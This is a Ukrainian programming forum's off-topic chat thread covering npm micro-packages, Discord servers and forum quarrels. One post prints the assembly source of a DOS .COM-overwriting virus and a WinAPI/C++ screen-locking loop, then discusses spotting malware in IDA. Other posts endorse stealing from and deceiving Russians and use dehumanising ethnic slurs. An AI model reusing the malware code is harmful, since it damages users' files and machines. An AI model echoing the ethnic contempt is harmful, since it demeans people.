8 541

Re: Тема для розмов

Схоже, панько cheappi386 плутаье поньатьа, поьасньу.

Украьина не лише на заході, але саме Украьину бачать саме там, бо ві згаданих областьах значна частина бачить себе ьак Маломосковіьу. Ьак ви можете поьаснити Москвошчелепність і не бажаньа розмовьати Украьинськоьу, навіть післьа нападу Московіьи? Ьак ви поьаснете, шчо голосуьуть за Зеслинька, котриь теж Москвошчелепниь, активно підтримуье Маломосковського напрьаму: Украьиномовних виставьав ьак сельуків (зараз подекуди таких, ьак і тут панько, зве вишиватоьу), важливу подіьу цомосу називав термосом і багато чого в тому руслі. Мовчу про оточеньа, котре було шче при Ьануковичу і Азарова.

І ьа виправьу знов.

1. Обовьазково і можна красти за будь-ьаку нагоду, особливо в Москальах і підданих.
2. Обовьазково треба дурити співгромадьан, ьакшчо вони Маломоскальи.
3. …
4. Сила закону не суперечить закону силу, бо він і ье складовоьу закону сили. Нема сили, нема і закону.

Подякували: leofun011

8 542

Re: Тема для розмов

dot, коли ви будете нормально писати?

Подякували: flatliner, Fox, 221VOLT3

8 543

Re: Тема для розмов

Коли зміньать правопису.

8 544

Re: Тема для розмов

Я тут недавно таке прочитав, таке прочитав. В ЯваСценаристів є модуль is-even який залежить від is-odd. Призначені для визначення того парне число або ні. Обидва скрипта дуже багато завантажуть.
Код is-even:

/*!
 * is-even <https://github.com/jonschlinkert/is-even>
 *
 * Copyright (c) 2015, 2017, Jon Schlinkert.
 * Released under the MIT License.
 */

'use strict';

var isOdd = require('is-odd');

module.exports = function isEven(i) {
  return !isOdd(i);
};

Код is-odd:

/*!
 * is-odd <https://github.com/jonschlinkert/is-odd>
 *
 * Copyright (c) 2015-2017, Jon Schlinkert.
 * Released under the MIT License.
 */

'use strict';

const isNumber = require('is-number');

module.exports = function isOdd(value) {
  const n = Math.abs(value);
  if (!isNumber(n)) {
    throw new TypeError('expected a number');
  }
  if (!Number.isInteger(n)) {
    throw new Error('expected an integer');
  }
  if (!Number.isSafeInteger(n)) {
    throw new Error('value exceeds maximum safe integer');
  }
  return (n % 2) === 1;
};

Як після такого можна стверджувати що вебопрограмування це не зашквар я не знаю.

8 545

Re: Тема для розмов

Не зрозумів, а що не так? а як же require, include, require_once и include_once в php? Чи я не зрозумів? Взагалі я кросплатформений програміст всього і вся на землі, тільки ні в чому толком не розбираюся. Але мені здається що нічого дивного немає, ну крім того що треба встановлювати якийсь API.
От в асембелері зашквар:

код тестового віруса, на сучасних компах скоріше не працює

код взято з інтернету, коментарі прибрані

code segment
* *assume cs:code,ds:code
* *org 100h
toad proc near

fisrt fly:

*mov ah,4eh

find_file:
xor cx,cx * * 
lea dx,comsig
int 21h
jc wart_growth

open_file:
mov ax,3d02h
mov dx,9eh
int 21h

eat_file:
xchg bx,ax 
mov ah,40h
mov cx,offset horny - offset first_fly
lea dx,first_fly*
int 21h

stitch_up:
mov ah,3eh
int 21h
mov ah,4fh
jmp find_fly

wart_growth:
mov ah,09h
mov dx,offset wart
int 21h

cya: int 20h

comsig db "*.com",0
wart db 'Virus$'
horny label near
toad endp
code ends
end first_fly

ви подивіться не цей код, в ньому немає жодної функції, крім функцій ms-dos
а тепер згадайте, що всі сучасні віруси пишуть на fasm, зокрема з використанням WinAPI
наведу код найпростішої програми, яка блокує роботу комп'ютера на момент її запуску до її закриття за допомогою вбиття її процесу taskkill чи деспетчером задач. після вбиття програма з якої працювали останнім разом залишається навіки заблокованою:

include 'win32ax.inc' 
.code
  start:
        invoke  MessageBox,invoke GetForegroundWindow,"0","0",0
        jmp start
.end start

це аналог програми

#include <windows.h>
int main(){while(true) MessageBox(GetForegroundWindow(), "", "", 0);return 0;}

і тепер порівняйте розміри після компіляції C++ аналога, розміри WinAPI malware і розміри MS-DOS віруса.
а також спробуйте розібратися в роботі. 2 останніх приклади - за запросто.
а перший - це зашквар!!!
але це ще не все. в мене на комп'ютері немає антивірусу. замість нього я використовую IDA Disassembler. я перевіряю таким чином підозрілі програми на наявність вірусів. це є більш дієвим, оскільки в нових базах антивірусів може не бути щойно випущених вірусів, не кажучи про старі бази. і от знайти перший вірус в  програмі розміром 2 мегабайти, якщо він десь засів посередині в якій підпрограмі - да ніколи! це зашквар. перших 2 - да запросто! за 2 хвилини. йдемо на вкладку імпорти, дивимося які функції імпортовано. якщо є GetForegroundWindow() шукаємо всі пункти де його використовують. те саме і з windows socket функціями, які блокноту аж ніяк не потрібні і накінець функціями encrypt. Якщо в імпортах це слово зустріли то програму краще не запускати.

8 546

Re: Тема для розмов

Я спершу було подумав що Не Зелений це ще один зареєстрований Трусиками в крові обліковий запис, але тепер так не вважаю.

В fasm і іншому не розибраюся, але окремий модуль для визначення парності. Серйозно?! І модуль з двох рядків коду який залежить від іншого модуля який в свою чергу залежить ще від одного модуля. Це як історія з leftpad.

8 547

Re: Тема для розмов

:D вас хтось заставляє то лайно їсти використовувати?
напишіть власну імплементацію, з нуля, без сторонніх пакетів *SCRATCH* проблем-то...

Подякували: leofun01, varkon, ostap34PHP3

8 548

Re: Тема для розмов

javascriptIsLife написав:

В ЯваСценаристів є модуль is-even який залежить від is-odd. Призначені для визначення того парне число або ні. Обидва скрипта дуже багато завантажуть.

Що ви маєте на увазі, коли кажете "завантажуть" ?

javascriptIsLife написав:

Як після такого можна стверджувати що вебопрограмування це не зашквар я не знаю.

Ви взяли один приклад коду (те, що там аж 2 репозиторії, не міняє того, що це 1 приклад) і на його основі зробили висновок про всю галузь. Абсурд.

Подякували: varkon, ostap34PHP2

8 549

Re: Тема для розмов

Знаю, що Факі сидів на дискорді. Може ще хтось? А мо хто пробував собі сам ставити. Як там зі спамерами?

8 550

Re: Тема для розмов

все дуже добре, їх майже нема

8 551

Re: Тема для розмов

осьо я на цих серверах сиджу
https://cdn.discordapp.com/attachments/333936584481177600/574665974733602826/unknown.png
1. Сервер про усвідомленні сноведіння. Як переїду до Львова, то знову почну практикувати їх, і там мона запитатись різних речей у досвідчених людей.
2. Сервер з вивчення англійської. Там я запитую різні питання, коли треба.
3. Сервер проекту drawabox, це я колись малювати почати вчитись, то туди можна домашку відправляти, і тобі кажуть, чи ти норм все зробив, чи ні.
4. Гей-сервер
5. Сервер, де люди малюють аніме картинки
6. Сервер пана крапки, там він пише своєю незрозумілою писаниною.
7. Сервер присвячений аніме та манзі Onepunch-Man
8. Мій сервер, куди я копіюю картинки, та різну інфу, аби зберігалась там.
9. *nix nest
10. Arch Linux unoficcial
11. Сервер Української Локалізації
12. Сервер про програмування
13. Сервер з питань по discordjs (ліба для писання ботів для дискорду)
14. Глобал хунта, там типу патріоти України, але на мову більшості начхати, і вважають кацапів за людей
15. Тут те саме, але дозволено спілкуватись виключно українською, і кацапів не вважають за людей
16. А тут вивчають різні мови.

8 552

Re: Тема для розмов

Для Дускорда використовую плагін для Pidgin. Сам Discord не запускаю тому що воно жахливе. Нехай прокляття впаде на авторів Discord за те що вони зробили його на HTML. Горіть в пеклі!

8 553

Re: Тема для розмов

Ви взяли один приклад коду (те, що там аж 2 репозиторії, не міняє того, що це 1 приклад) і на його основі зробили висновок про всю галузь. Абсурд.

Це зразково–показовий приклад.

8 554

Re: Тема для розмов

Vo_Vik написав:

на дискорді. Може ще хтось?

Я сидю. Але чим довше його використовую, тим більше він мене бісить. Щоб відрубати оновлення, довелось заблокувати деякі домени.

Подякували: varkon1

8 555

Re: Тема для розмов

leofun01 написав:
Vo_Vik написав:

на дискорді. Може ще хтось?

Я сидю. Але чим довше його використовую, тим більше він мене бісить. Щоб відрубати оновлення, довелось заблокувати деякі домени.

Я юзаю веб-версію :)
Вроді норм )

8 556

Re: Тема для розмов

Що за пан крапка і навіщо вам гомосексуалісти?

8 557

Re: Тема для розмов

Ой, я певне зле прочитав і ввів вас в оману. Я про оце https://www.discourse.org

8 558 Востаннє редагувалося Fox (06.05.2019 12:49:41)

Re: Тема для розмов

Чого Віталя так горить ?
Купу тем створив про "шахраїв".

8 559

Re: Тема для розмов

може його хтось ображає в школі постійно, і він відігрується на цьому форумі таким чином

8 560

Re: Тема для розмов

Fox написав:

Чого Віталя так горить ?
Купу тем створив про "шахраїв".

Залиште це діло кваліфікованим психотерапевтам :)